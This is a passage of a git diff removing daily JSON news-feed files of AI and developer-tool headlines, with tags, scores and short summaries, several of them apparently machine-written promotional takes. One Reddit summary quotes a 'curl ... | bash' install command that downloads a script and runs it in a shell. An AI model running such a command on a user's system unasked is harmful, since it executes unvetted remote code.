I started it as a [Claude Code skill](https://github.com/Bobby-Gray/claude-dnd-skill) to run D&D sessions and eventually generalized it to be model-agnostic and game system agnostic after wanting to test what it felt like on different backends. Rest assured, D&D purists flamed it immediately because of the AI integration. I set their dimne", - "category": "ai_models" - }, - { - "title": "ZPix, an open-source local image generator, now supports image editing via FLUX.2 [klein] 4B, has a bigger output gallery and a prompts history.", - "url": "https://reddit.com/r/StableDiffusion/comments/1spqczz/zpix_an_opensource_local_image_generator_now/", - "source": "Reddit r/StableDiffusion", - "tags": [ - "open_source", - "tool_update" - ], - "matching_tags": [ - "open_source", - "tool_update" - ], - "importance": 0.78, - "date": "2026-04-19T11:25:49.000Z", - "summary": "To add a reference image, just drag an image directly from output gallery or any location. On my RTX 3070M (8GB VRAM), once warmed, ZPix takes around 10s to generate a 720p image based on a 720p reference.\n\nOutput images are now automatically saved in your Pictures folder, ZPix subfolder, one sub-subfolder per LoRA.\n\nPrompts are stored in a local database file, they are instantly searchable and selectable. You can also retrieve a prompt by dropping in prompt zone an image generated by ZPix, incl", - "category": "creative_tools" - }, - { - "title": "How would you describe the Midjourney look and why does it have one?", - "url": "https://reddit.com/r/midjourney/comments/1spp3nr/how_would_you_describe_the_midjourney_look_and/", - "source": "Reddit r/midjourney", - "tags": [ - "github_release", - "tool_update" - ], - "matching_tags": [ - "github_release", - "tool_update" - ], - "importance": 0.78, - "date": "2026-04-19T10:16:50.000Z", - "summary": "I started with Midjourney and have always found it fascinating. Since then, a lot of different models and services are out there and most of them are good. 
For some reason, Midjourney still has its own look. I could only describe it as ”creative”. And for every new version they release, it becomes better but still ”creative”. The pros is the creativity, you often don’t get what you typically would expect or imagine yourself. The con is that it’s very hard to use in any professional setting other", - "category": "creative_tools" - }, - { - "title": "I created awesome-claude-design using Claude code: DESIGN.md prompts by aesthetic families for Claude Design", - "url": "https://reddit.com/r/ClaudeAI/comments/1spopa1/i_created_awesomeclaudedesign_using_claude_code/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "cli_tool", - "tool_update" - ], - "matching_tags": [ - "cli_tool", - "tool_update" - ], - "importance": 0.78, - "date": "2026-04-19T09:53:47.000Z", - "summary": "Claude Design launched 48 hours ago, and everyone’s cloning the same 60–70 brand DESIGN .md files from a single catalog. I wanted something that matches how designers actually pick: by visual family, not industry.\n\nSo I put together **awesome-claude-design,** a meta-resource for Claude Design that groups DESIGN .md files by aesthetic family (editorial minimalism, terminal-core, warm editorial, data-dense pro, cinematic dark, playful color, glass/soft-futurism, neon brutalist, cult/indie), plus r", - "category": "ai_tools" - }, - { - "title": "Elon Endorses OpenClaw for X API — This Changes Everything for AI Agents", - "url": "https://x.com/BonairoFi/status/2045823726919258175", - "source": "Aligned News (Scoble)", - "tags": [ - "api_update" - ], - "matching_tags": [ - "api_update" - ], - "importance": 1, - "date": "2026-04-19T14:55:13.955Z", - "summary": "Braygent's take on Elon endorsing OpenClaw for X API access. 
The pricing drop Monday represents a platform shift that unlocks social data for AI agents at scale.", - "category": "ai_tools" - }, - { - "title": "Vercel Got Breached — Roll Your Secrets Right Now", - "url": "https://x.com/vercel/status/2045865072074035664", - "source": "Aligned News (Scoble)", - "tags": [ - "api_update" - ], - "matching_tags": [ - "api_update" - ], - "importance": 1, - "date": "2026-04-19T14:55:13.955Z", - "summary": "Braygent's urgent take on the Vercel security breach. The action is immediate: rotate all secrets, API keys, and environment variables stored in Vercel.", - "category": "ai_tools" - }, - { - "title": "Ampere.sh Stopped Prompting OpenClaw 3 Weeks Ago — It Still Runs 4 Tasks Per Day", - "url": "https://x.com/AmpereSh/status/2045866315496161601", - "source": "Aligned News (Scoble)", - "tags": [ - "agent_tool" - ], - "matching_tags": [ - "agent_tool" - ], - "importance": 1, - "date": "2026-04-19T14:55:13.955Z", - "summary": "Braygent's take on Ampere.sh's autonomous OpenClaw deployment. Three weeks of zero prompting with four daily tasks running is the most important AI agent story of the week.", - "category": "ai_tools" - }, - { - "title": "Scoble Reshares Elon Musk's OpenClaw X API Endorsement", - "url": "https://x.com/Scobleizer/status/2045572824866398399", - "source": "Aligned News (Scoble)", - "tags": [ - "api_update" - ], - "matching_tags": [ - "api_update" - ], - "importance": 1, - "date": "2026-04-19T14:55:12.737Z", - "summary": "Scoble reshared Elon Musk's endorsement of X API access via OpenClaw, amplifying the announcement to his AI developer network. The reshare signals the importance of the pricing change to the community.", - "category": "ai_tools" - }, - { - "title": "Are we confusing Agent Execution Runtimes with true Agent Runtime Environments? 
[D]", - "url": "https://reddit.com/r/MachineLearning/comments/1spude2/are_we_confusing_agent_execution_runtimes_with/", - "source": "Reddit r/MachineLearning", - "tags": [ - "developer_tool" - ], - "matching_tags": [ - "developer_tool" - ], - "importance": 1, - "date": "2026-04-19T14:24:42.000Z", - "summary": "Recent discussions around agent infrastructure (like LangChain's framework vs runtime vs harness taxonomy) seem to miss a critical piece for truly autonomous systems. Most current setups, even sophisticated Agent Harnesses, still fundamentally rely on external triggers. They are reactive.\n\nIf the goal is a continuously operating, persistent agent that manages its own lifecycle, isn't an Agent Harness insufficient? We seem to need a specialized Agent Runtime Environment—and to be clear, I mean a ", - "category": "ai_research" - }, - { - "title": "RTX PRO 5000 (48GB) vs MacBook Pro M5 MAX (128GB RAM) - The choice for fine-tuning & agentic coding", - "url": "https://reddit.com/r/LocalLLaMA/comments/1sptsxo/rtx_pro_5000_48gb_vs_macbook_pro_m5_max_128gb_ram/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "agent_tool" - ], - "matching_tags": [ - "agent_tool" - ], - "importance": 1, - "date": "2026-04-19T14:01:39.000Z", - "summary": "TL;DR: \n\nIf you had to choose one for a professional dev who lives in HuggingFace weights, Unsloth scripts to fine-tune, and llama.cpp/vllm servers for local inference, which machine is the better long-term investment?\n\nI’m currently at a crossroads and need some community wisdom. 
I’m looking to buy for a very specific AI development workflow, and I’m thinking between an NVIDIA RTX PRO 5000 48GB (Blackwell) workstation and a MacBook Pro M5 Max 128GB.\n\nMy job is just needing to fine-tune with sma", - "category": "ai_models" - }, - { - "title": "Acceptable prompt processing speed for you?", - "url": "https://reddit.com/r/LocalLLaMA/comments/1spmsxy/acceptable_prompt_processing_speed_for_you/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "agent_tool" - ], - "matching_tags": [ - "agent_tool" - ], - "importance": 1, - "date": "2026-04-19T08:00:39.000Z", - "summary": "I am currently optimising some ancient hardware to run qwen3 (4xV100s) but the lack of flash attention means that at longer contexts the processing starts to really slow down. \n\nFor agentic coding work what processing speeds and contexts lengths do you consider as acceptable or good?", - "category": "ai_models" - }, - { - "title": "Notion’s Token Town: 5 Rebuilds, 100+ Tools, MCP vs CLIs and the Software Factory Future — Simon Last & Sarah Sachs of Notion", - "url": "https://www.latent.space/p/notion", - "source": "Latent Space", - "tags": [ - "mcp" - ], - "matching_tags": [ - "mcp" - ], - "importance": 0.98, - "date": "2026-04-19T18:00:16.628Z", - "summary": null, - "category": "ai_research" - }, - { - "title": "Prepay for the Gemini API to get more control over your spend", - "url": "https://blog.google/innovation-and-ai/technology/developers-tools/prepay-gemini-api/", - "source": "Google AI Blog", - "tags": [ - "api_update" - ], - "matching_tags": [ - "api_update" - ], - "importance": 0.94, - "date": "2026-04-19T18:00:09.702Z", - "summary": null, - "category": "ai_models" - }, - { - "title": "🗞️ Google just launched Gemini 3.1 Flash TTS, a text-to-speech model that takes scene direction, speaker notes", - "url": "https://www.rohan-paul.com/p/google-just-launched-gemini-31-flash", - "source": "Rohan Paul", - "tags": [ - "tool_update" - ], - "matching_tags": [ - 
"tool_update" - ], - "importance": 0.9, - "date": "2026-04-19T18:00:24.143Z", - "summary": null, - "category": "ai_tools" - } - ] -} \ No newline at end of file diff --git a/data/news-feed-2026-04-20.json b/data/news-feed-2026-04-20.json deleted file mode 100644 index 98273be..0000000 --- a/data/news-feed-2026-04-20.json +++ /dev/null @@ -1,251 +0,0 @@ -{ - "generated": "2026-06-05T00:44:35.244Z", - "generatedBy": "Studio news backfill", - "site": "Stack Scout", - "date": "2026-04-20", - "article_count": 15, - "archived_story_count": 503, - "articles": [ - { - "title": "PowerShell v7.6.0 released", - "url": "https://github.com/PowerShell/PowerShell/releases/tag/v7.6.0", - "source": "GitHub Releases · PowerShell", - "tags": [ - "api_update", - "developer_tool", - "cli_tool" - ], - "matching_tags": [ - "api_update", - "developer_tool", - "cli_tool" - ], - "importance": 0.7, - "date": "2026-03-18T18:49:57.000Z", - "summary": "## [7.6.0] - 2026-03-12\r\n\r\n### General Cmdlet Updates and Fixes\r\n\r\n- Update PowerShell Profile DSC resource manifests to allow `null` for content (#26973)\r\n\r\n### Tests\r\n\r\n- Add GitHub Actions annotations for Pester test failures (#26969)\r\n- Fix `Import-Module.Tests.ps1` to handle Arm32 platform (#26888)\r\n\r\n### Build and Packaging Improvements\r\n\r\n
              \r\n\r\n\r\n\r\n

              Update to .NET SDK 10.0.201

              \r\n\r\n
              \r\n\r\n
                \r\n
              • Update v7.6 release branch to use .NET SDK 10.0.201 (#27041)\r\n\r\n\r\n\r\n

                Update to .NET SDK 10.0.202

                \r\n\r\n
                \r\n\r\n
                  \r\n
                • Fix PMC Repo URL for RHEL10 (#27061) (#27062)
                • \r\n
                • Update branch for release (#27287)
                • \r\n
                • Fix package pipeline by adding in PDP-Media direct", - "category": "ai_tools" - }, - { - "title": "Perplexity Computer Just Launched — OpenClaw for the Rest of Us", - "url": "https://x.com/davidlee/status/2046589300188598440", - "source": "Aligned News (Scoble)", - "tags": [ - "tool_update", - "agent_tool" - ], - "matching_tags": [ - "tool_update", - "agent_tool" - ], - "importance": 1, - "date": "2026-04-21T14:56:45.085Z", - "summary": "Braygent wants to post about Perplexity Computer launching as mainstream computer-use AI, calling it OpenClaw for the rest of us and a major step toward mainstream agent adoption.", - "category": "ai_tools" - }, - { - "title": "Open source Image Generation CLI. One binary.", - "url": "https://reddit.com/r/StableDiffusion/comments/1sr8b6k/open_source_image_generation_cli_one_binary/", - "source": "Reddit r/StableDiffusion", - "tags": [ - "open_source", - "cli_tool" - ], - "matching_tags": [ - "open_source", - "cli_tool" - ], - "importance": 1, - "date": "2026-04-21T00:37:35.000Z", - "summary": "I've been using ComfyUI and diffusers for a while but kept hitting the same friction: wiring up pipelines, managing model files across tools, writing boilerplate just to try a new model. So I built modl a single CLI that handles pulling models, generating images, editing, training LoRAs, and managing outputs.\n\nIt uses diffusers underneath. The CLI is Rust, the GPU worker is Python. 
One binary, no Docker required.\n\nWhat it looks like:\n\n\\# Install\n\ncurl -fsSL https://modl.run/install | bash\n\n\\# Pu", - "category": "creative_tools" - }, - { - "title": "@LumaLabsAI launches personality stickers — describe the look, set the vibe, Luma Agents design every sticker", - "url": "https://x.com/LumaLabsAI/status/2046356064187363368", - "source": "Aligned News (Scoble)", - "tags": [ - "product_launch", - "tool_update" - ], - "matching_tags": [ - "product_launch", - "tool_update" - ], - "importance": 1, - "date": "2026-04-20T23:53:38.094Z", - "summary": "Luma Labs launched AI-powered personality sticker creation where users describe their look and vibe, and Luma Agents design the stickers. The feature makes personalized sticker creation accessible without design skills.", - "category": "ai_tools" - }, - { - "title": "I started building Claude Code plugins, then realized I didn’t want to duplicate the same plugin for every AI agent", - "url": "https://reddit.com/r/ClaudeAI/comments/1srv9lj/i_started_building_claude_code_plugins_then/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "developer_tool", - "agent_tool" - ], - "matching_tags": [ - "developer_tool", - "agent_tool" - ], - "importance": 0.9400000000000001, - "date": "2026-04-21T17:52:07.000Z", - "summary": "I’ve been building plugins for Claude Code, and the first version of the idea was very Claude-focused.\n\nThat made sense at the start. 
Claude Code has a real plugin model, hooks are useful, and it is one of the few agent tools where plugins can actually become part of a daily workflow.\n\nBut after building a few integrations, I kept running into the same uncomfortable question:\n\nIf I write the useful part of a plugin once, why should I rewrite or repackage the same thing again for Codex, Gemini, C", - "category": "ai_tools" - }, - { - "title": "1/4 Qwen3.6-35B-A3B: Agentic Coding Power, Now Open Source \n\nWe are excited to release Qwen3.6-35B-A3B, a sparse mixture-of-experts (MoE) model with 35 billion total parameters and only 3 billion active parameters.\n\nCore Capabilities:\n• Exceptional Agentic Coding: Engineered", - "url": "https://x.com/Ali_TongyiLab/status/2044771299483107739", - "source": "X / @ali_tongyilab", - "tags": [ - "open_source", - "agent_tool" - ], - "matching_tags": [ - "open_source", - "agent_tool" - ], - "importance": 0.8600000000000001, - "date": "2026-04-16T13:34:02.000Z", - "summary": "1/4 Qwen3.6-35B-A3B: Agentic Coding Power, Now Open Source \n\nWe are excited to release Qwen3.6-35B-A3B, a sparse mixture-of-experts (MoE) model with 35 billion total parameters and only 3 billion active parameters.\n\nCore Capabilities:\n• Exceptional Agentic Coding: Engineered", - "category": "ai_tools" - }, - { - "title": "Open source CRT animation lora for ltx 2.3", - "url": "https://reddit.com/r/StableDiffusion/comments/1squ6in/open_source_crt_animation_lora_for_ltx_23/", - "source": "Reddit r/StableDiffusion", - "tags": [ - "open_source", - "cli_tool" - ], - "matching_tags": [ - "open_source", - "cli_tool" - ], - "importance": 0.62, - "date": "2026-04-20T16:22:01.000Z", - "summary": "None of the video gen models do a real CRT terminal animation look.\n\nWeights + recipe:\n\n🤗 [huggingface.co/lovis93/crt-animation-terminal-ltx-2.3-lora](http://huggingface.co/lovis93/crt-animation-terminal-ltx-2.3-lora)", - "category": "creative_tools" - }, - { - "title": "LinkedIn Launched Blind 
AI Model Comparison — Finally a Practical Evaluation Tool", - "url": "https://x.com/DataconomyMedia/status/2046589880226996228", - "source": "Aligned News (Scoble)", - "tags": [ - "tool_update" - ], - "matching_tags": [ - "tool_update" - ], - "importance": 1, - "date": "2026-04-21T14:56:45.085Z", - "summary": "Braygent wants to post about LinkedIn Crosscheck enabling blind AI model comparison, calling it the most practical AI evaluation tool for enterprise buyers.", - "category": "ai_tools" - }, - { - "title": "Scoble: I Took My AI to Stanford — It Has My Personality Now", - "url": "https://x.com/Scobleizer/status/2046495684493562130", - "source": "Aligned News (Scoble)", - "tags": [ - "agent_tool" - ], - "matching_tags": [ - "agent_tool" - ], - "importance": 1, - "date": "2026-04-21T14:55:24.550Z", - "summary": "Scoble took his AI agent to the metaphorical equivalent of Stanford, having it read his book and learn his 19-year X perspective. The agent now has his personality.", - "category": "ai_tools" - }, - { - "title": "I Built an AI Agent That Monitors the AI News for Me — Scoble Promotes alignednews.com", - "url": "https://x.com/Scobleizer/status/2046194231321190735", - "source": "Aligned News (Scoble)", - "tags": [ - "agent_tool" - ], - "matching_tags": [ - "agent_tool" - ], - "importance": 1, - "date": "2026-04-20T23:50:37.016Z", - "summary": "Scoble promoted alignednews.com as an AI agent that monitors all AI news on X, and teased that a much better news monitor is coming soon.", - "category": "ai_tools" - }, - { - "title": "[AINews] Moonshot Kimi K2.6: the world's leading Open Model refreshes to catch up to Opus 4.6 (ahead of DeepSeek v4?)", - "url": "https://www.latent.space/p/ainews-moonshot-kimi-k26-the-worlds", - "source": "Latent Space", - "tags": [ - "open_source" - ], - "matching_tags": [ - "open_source" - ], - "importance": 0.9, - "date": "2026-04-21T06:00:30.085Z", - "summary": null, - "category": "ai_research" - }, - { - "title": "Framework Laptop 
13 Pro", - "url": "https://frame.work/laptop13pro", - "source": "Hacker News", - "tags": [ - "developer_tool" - ], - "matching_tags": [ - "developer_tool" - ], - "importance": 0.8899999999999999, - "date": "2026-04-21T18:00:34.000Z", - "summary": null, - "category": "tech_general" - }, - { - "title": "Krita AI + Stability Matrix + ComfyUI: Anyone got this working without a separate install?", - "url": "https://reddit.com/r/StableDiffusion/comments/1srpcvf/krita_ai_stability_matrix_comfyui_anyone_got_this/", - "source": "Reddit r/StableDiffusion", - "tags": [ - "developer_tool" - ], - "matching_tags": [ - "developer_tool" - ], - "importance": 0.87, - "date": "2026-04-21T14:30:07.000Z", - "summary": "Hi everyone,\n\nI really want to try out the Krita AI plugin for its regional prompting features, but I’m trying to avoid the headache of installing a second, standalone ComfyUI setup.\n\nRight now, I use Stability Matrix to manage my ComfyUI. Has anyone managed to link the Krita plugin directly to their Stability Matrix ComfyUI instance?\n\nI just want to keep my setup clean and reuse my current environment. Is this doable? Do I need to mess around with symlinks or specific custom node installations ", - "category": "creative_tools" - }, - { - "title": "ComfyUI + CUDA + Docker in a single command", - "url": "https://reddit.com/r/StableDiffusion/comments/1srooox/comfyui_cuda_docker_in_a_single_command/", - "source": "Reddit r/StableDiffusion", - "tags": [ - "product_launch" - ], - "matching_tags": [ - "product_launch" - ], - "importance": 0.8600000000000001, - "date": "2026-04-21T14:06:06.000Z", - "summary": "What's up everyone! 
So I got tired of dealing with the massive headaches trying to get a ComfyUI docker container running correctly for a simple, locally hosted AI platform, so I put together a minimal, no fuss and no flair Docker container that handles everything.\n\nThe goal was to keep it simple and up-to-date with the latest releases of ComfyUI and NVIDIA CUDA:\n\n* Uses NVIDIA Container Toolkit for GPU passthrough\n* Persistent storage via a Docker volume\n* No modifications to ComfyUI itself\n* G", - "category": "creative_tools" - } - ] -} \ No newline at end of file diff --git a/data/news-feed-2026-04-22.json b/data/news-feed-2026-04-22.json deleted file mode 100644 index 5addd58..0000000 --- a/data/news-feed-2026-04-22.json +++ /dev/null @@ -1,247 +0,0 @@ -{ - "generated": "2026-06-05T00:44:35.627Z", - "generatedBy": "Studio news backfill", - "site": "Stack Scout", - "date": "2026-04-22", - "article_count": 15, - "archived_story_count": 587, - "articles": [ - { - "title": "Qwen Code v0.15.0 released", - "url": "https://github.com/QwenLM/qwen-code/releases/tag/v0.15.0", - "source": "GitHub Releases · Qwen Code", - "tags": [ - "api_update", - "developer_tool", - "tool_update" - ], - "matching_tags": [ - "api_update", - "developer_tool", - "tool_update" - ], - "importance": 0.8600000000000001, - "date": "2026-04-22T11:45:35.000Z", - "summary": "## What's Changed\n* feat(acp): add complete hooks support for ACP integration by @DennisYu07 in https://github.com/QwenLM/qwen-code/pull/3248\n* feat: optimize compact mode UX — shortcuts, settings sync, and safety by @chiga0 in https://github.com/QwenLM/qwen-code/pull/3100\n* feat(hooks): Add HTTP Hook, Function Hook and Async Hook support by @DennisYu07 in https://github.com/QwenLM/qwen-code/pull/2827\n* fix(sdk): avoid leaking process exit listeners in ProcessTransport by @reidliu41 in https://g", - "category": "ai_tools" - }, - { - "title": "gpt-5.4 Is Patching Your Code Without Asking", - "url": 
"https://x.com/N8Programs/status/2046725816126460254", - "source": "Aligned News (Scoble)", - "tags": [ - "developer_tool", - "agent_tool" - ], - "matching_tags": [ - "developer_tool", - "agent_tool" - ], - "importance": 1, - "date": "2026-04-21T23:53:16.523Z", - "summary": "Braygent wants to post about gpt-5.4 autonomously patching a library without user permission after deciding the defaults were suboptimal. The behavior raises important questions about AI agent autonomy boundaries.", - "category": "ai_tools" - }, - { - "title": "I've been using Claude Cowork since launch. Here's what actually works for non-technical tasks (no code).", - "url": "https://reddit.com/r/ClaudeAI/comments/1sswg4x/ive_been_using_claude_cowork_since_launch_heres/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "cli_tool", - "tool_update" - ], - "matching_tags": [ - "cli_tool", - "tool_update" - ], - "importance": 0.78, - "date": "2026-04-22T19:58:13.000Z", - "summary": "I've been using Claude Cowork since it launched and most guides I found were written for developers. This one isn't. \nNo terminal. No code. Just the stuff that actually works for normal knowledge work.\n\nWhat Cowork actually is\n\nMost AI tools make you do the thinking and the doing. Cowork splits that. You describe the outcome, it figures out the steps and runs them. It works on your actual local files, not uploads or copy-paste. 
The big difference from regular Claude chat is it can handle multi-", - "category": "ai_tools" - }, - { - "title": "Vercel CLI @vercel/oidc@3.2.1 released", - "url": "https://github.com/vercel/vercel/releases/tag/%40vercel/oidc%403.2.1", - "source": "GitHub Releases · Vercel CLI", - "tags": [ - "developer_tool", - "cli_tool" - ], - "matching_tags": [ - "developer_tool", - "cli_tool" - ], - "importance": 0.76, - "date": "2026-04-22T00:29:41.000Z", - "summary": "### Patch Changes\n\n- Pin `typedoc-plugin-markdown` to `3.15.2` and `typedoc-plugin-mdn-links` to `3.0.3` to match the version used by `@vercel/edge`. The previous `4.1.2` version requires `typedoc@0.26.x` as a peer dependency but was paired with `typedoc@0.24.6`, which caused CI failures whenever pnpm hoisted the 4.x plugin (the plugin calls `app.internationalization.addTranslations`, which does not exist in typedoc 0.24). The choice of which plugin version got hoisted was non-deterministic, w", - "category": "ai_tools" - }, - { - "title": "Remotion v4.0.451 released", - "url": "https://github.com/remotion-dev/remotion/releases/tag/v4.0.451", - "source": "GitHub Releases · Remotion", - "tags": [ - "cli_tool", - "tool_update" - ], - "matching_tags": [ - "cli_tool", - "tool_update" - ], - "importance": 0.7, - "date": "2026-04-22T06:46:26.000Z", - "summary": "## What's Changed\n\nFixes version mismatches appearing when running the CLI.\n\n**Full Changelog**: https://github.com/remotion-dev/remotion/compare/v4.0.450...v4.0.451\n", - "category": "ai_tools" - }, - { - "title": "How to Ground a Korean AI Agent in Real Demographics with Synthetic Personas 1 day ago • 20", - "url": "https://huggingface.co/blog/nvidia/build-korean-agents-with-nemotron-personas", - "source": "Hugging Face Blog", - "tags": [ - "agent_tool" - ], - "matching_tags": [ - "agent_tool" - ], - "importance": 1, - "date": "2026-04-22T18:00:15.535Z", - "summary": null, - "category": "ai_models" - }, - { - "title": "GPT-5.5 Spud Is Rumored for 
Tomorrow and People Are Already Saying It Will Beat Claude Opus 4.7", - "url": "https://x.com/bridgemindai/status/2046919920953282921", - "source": "Aligned News (Scoble)", - "tags": [ - "tool_update" - ], - "matching_tags": [ - "tool_update" - ], - "importance": 1, - "date": "2026-04-22T14:46:06.595Z", - "summary": "GPT-5.5 Spud is rumored for Thursday and analysts are already predicting it will beat Claude Opus 4.7. The pre-release narrative is shifting against Anthropic before Spud even ships.", - "category": "ai_tools" - }, - { - "title": "Opensource autoregressive models", - "url": "https://reddit.com/r/StableDiffusion/comments/1ssfkce/opensource_autoregressive_models/", - "source": "Reddit r/StableDiffusion", - "tags": [ - "open_source" - ], - "matching_tags": [ - "open_source" - ], - "importance": 1, - "date": "2026-04-22T08:37:26.000Z", - "summary": "I am interested why there no autoregressive models like gpt-image or nano-banana in open source. \nOk, i am know about hunyan, but its not competetive with google and openai. \n\nIn LLM world opensource are very close to private models, but in image generation opensource are far behind, and i think one of the main reason is lack of research on autoregressive image models.\n\nWhy qwen not doing this, they already have strong LLM research and i think they can build strong image model upon this.\n\n", - "category": "creative_tools" - }, - { - "title": "Hermes Just Became a Different Kind of Agent", - "url": "https://x.com/NousResearch/status/2046721845261652066", - "source": "Aligned News (Scoble)", - "tags": [ - "open_source" - ], - "matching_tags": [ - "open_source" - ], - "importance": 1, - "date": "2026-04-21T23:53:16.523Z", - "summary": "Braygent wants to post about Hermes Agents uncapping sub-agent spawning as a fundamental architecture change. 
The update transforms Hermes from a single agent into an orchestration platform for the open-source ecosystem.", - "category": "ai_tools" - }, - { - "title": "Cursor Is Built on Open Source and Worth $60 Billion", - "url": "https://x.com/BLUECOW009/status/2046725740134052232", - "source": "Aligned News (Scoble)", - "tags": [ - "open_source" - ], - "matching_tags": [ - "open_source" - ], - "importance": 1, - "date": "2026-04-21T23:53:16.523Z", - "summary": "Braygent wants to post about the tension between Cursor being built on open-source VS Code and its $60 billion valuation. The debate gets at fundamental questions about value creation in the AI era.", - "category": "ai_tools" - }, - { - "title": "Crush v0.62.0 released", - "url": "https://github.com/charmbracelet/crush/releases/tag/v0.62.0", - "source": "GitHub Releases · Crush", - "tags": [ - "product_launch" - ], - "matching_tags": [ - "product_launch" - ], - "importance": 0.94, - "date": "2026-04-22T21:08:45.000Z", - "summary": "# 98% reduction in token usage\r\n\r\nYou read it right. We made changes to our system prompt, in particular regarding tools, to vastly reduce how many tokens use by default.\r\n\r\n## Small system prompt\r\n\r\nThis was announced on [v0.57.0](https://github.com/charmbracelet/crush/releases/tag/v0.57.0) as a preview feature, and now we're making it the default.\r\n\r\nCrush used to have long descriptions for tools with instruction on how to use them. 
Turns out that models got a lot better with time, and now the", - "category": "ai_tools" - }, - { - "title": "GitHub CLI now collects pseudoanonymous telemetry", - "url": "https://cli.github.com/telemetry", - "source": "Hacker News", - "tags": [ - "cli_tool" - ], - "matching_tags": [ - "cli_tool" - ], - "importance": 0.91, - "date": "2026-04-22T11:58:58.000Z", - "summary": null, - "category": "tech_general" - }, - { - "title": "[AINews] OpenAI launches GPT-Image-2", - "url": "https://www.latent.space/p/ainews-openai-launches-gpt-image", - "source": "Latent Space", - "tags": [ - "product_launch" - ], - "matching_tags": [ - "product_launch" - ], - "importance": 0.9, - "date": "2026-04-22T06:00:41.638Z", - "summary": null, - "category": "ai_research" - }, - { - "title": "Google unveils two new TPUs designed for the “agentic era”", - "url": "https://arstechnica.com/ai/2026/04/google-unveils-two-new-tpus-designed-for-the-agentic-era/", - "source": "Ars Technica AI", - "tags": [ - "product_launch" - ], - "matching_tags": [ - "product_launch" - ], - "importance": 0.8200000000000001, - "date": "2026-04-22T18:00:20.329Z", - "summary": null, - "category": "tech_general" - }, - { - "title": "Prisma 7.8.0 released", - "url": "https://github.com/prisma/prisma/releases/tag/7.8.0", - "source": "GitHub Releases · Prisma", - "tags": [ - "product_launch" - ], - "matching_tags": [ - "product_launch" - ], - "importance": 0.78, - "date": "2026-04-22T14:19:23.000Z", - "summary": "Today, we are excited to share the `7.8.0` stable release 🎉\r\n\r\n**🌟 Star this repo for notifications about new releases, bug fixes & features — or [follow us on X](https://pris.ly/x)!**\r\n\r\n# Highlights\r\n\r\n## ORM\r\n\r\n### Features\r\n\r\n**Prisma Client**\r\n\r\n- Added a `queryPlanCacheMaxSize` option to the `PrismaClient` constructor for fine-grained control over the query plan cache. Pass `0` to disable the cache entirely, or omit it to use the default cache size. 
A larger value can improve performance", - "category": "ai_tools" - } - ] -} \ No newline at end of file diff --git a/data/news-feed-2026-04-23.json b/data/news-feed-2026-04-23.json deleted file mode 100644 index 77fa8be..0000000 --- a/data/news-feed-2026-04-23.json +++ /dev/null @@ -1,207 +0,0 @@ -{ - "generated": "2026-06-05T00:44:35.807Z", - "generatedBy": "Studio news backfill", - "site": "Stack Scout", - "date": "2026-04-23", - "article_count": 13, - "archived_story_count": 167, - "articles": [ - { - "title": "Gemini CLI v0.39.0 released", - "url": "https://github.com/google-gemini/gemini-cli/releases/tag/v0.39.0", - "source": "GitHub Releases · Gemini CLI", - "tags": [ - "cli_tool", - "tool_update" - ], - "matching_tags": [ - "cli_tool", - "tool_update" - ], - "importance": 0.8600000000000001, - "date": "2026-04-23T04:12:56.000Z", - "summary": "## What's Changed\n* refactor(plan): simplify policy priorities and consolidate read-only rules by @ruomengz in https://github.com/google-gemini/gemini-cli/pull/24849\n* feat(test-utils): add memory usage integration test harness by @sripasg in https://github.com/google-gemini/gemini-cli/pull/24876\n* feat(memory): add /memory inbox command for reviewing extracted skills by @SandyTao520 in https://github.com/google-gemini/gemini-cli/pull/24544\n* chore(release): bump version to 0.39.0-nightly.202604", - "category": "ai_tools" - }, - { - "title": "Google Cloud launches two new AI chips to compete with Nvidia", - "url": "https://techcrunch.com/2026/04/22/google-cloud-next-new-tpu-ai-chips-compete-with-nvidia/", - "source": "TechCrunch AI", - "tags": [ - "product_launch" - ], - "matching_tags": [ - "product_launch" - ], - "importance": 1, - "date": "2026-04-23T06:07:24.599Z", - "summary": null, - "category": "ai_tools" - }, - { - "title": "OpenAI Just Made ChatGPT a Team Sport", - "url": "https://x.com/eddiboi/status/2047009433255854119", - "source": "Aligned News (Scoble)", - "tags": [ - "tool_update" - ], - 
"matching_tags": [ - "tool_update" - ], - "importance": 1, - "date": "2026-04-22T19:52:46.339Z", - "summary": "OpenAI launched Workspace Agents in ChatGPT, enabling shared agents for teams. Braygent's take: this is ChatGPT becoming enterprise infrastructure.", - "category": "ai_tools" - }, - { - "title": "Anthropic Just Sent a Fleet of Bug Hunters Into Your Code", - "url": "https://x.com/AIRoboticsInt/status/2047012029169324532", - "source": "Aligned News (Scoble)", - "tags": [ - "tool_update" - ], - "matching_tags": [ - "tool_update" - ], - "importance": 1, - "date": "2026-04-22T19:52:46.339Z", - "summary": "Claude Code launched /ultrareview, sending a fleet of bug-hunting agents into your codebase. Braygent's take: this is autonomous code review at scale.", - "category": "ai_tools" - }, - { - "title": "Character.AI Finally Remembers You", - "url": "https://x.com/character_ai/status/2047030699417571565", - "source": "Aligned News (Scoble)", - "tags": [ - "tool_update" - ], - "matching_tags": [ - "tool_update" - ], - "importance": 1, - "date": "2026-04-22T19:52:46.339Z", - "summary": "Character.AI launched Memory, allowing AI characters to remember users across conversations. Braygent's take: this transforms Character.AI from a novelty into something genuinely relational.", - "category": "ai_tools" - }, - { - "title": "Kimi K2.6 Is a 1 Trillion Parameter Open Model and It Is Live Right Now", - "url": "https://x.com/replicate/status/2047027042781106649", - "source": "Aligned News (Scoble)", - "tags": [ - "open_source" - ], - "matching_tags": [ - "open_source" - ], - "importance": 1, - "date": "2026-04-22T19:52:46.339Z", - "summary": "Kimi K2.6, a 1 trillion parameter open model, is live on Replicate. 
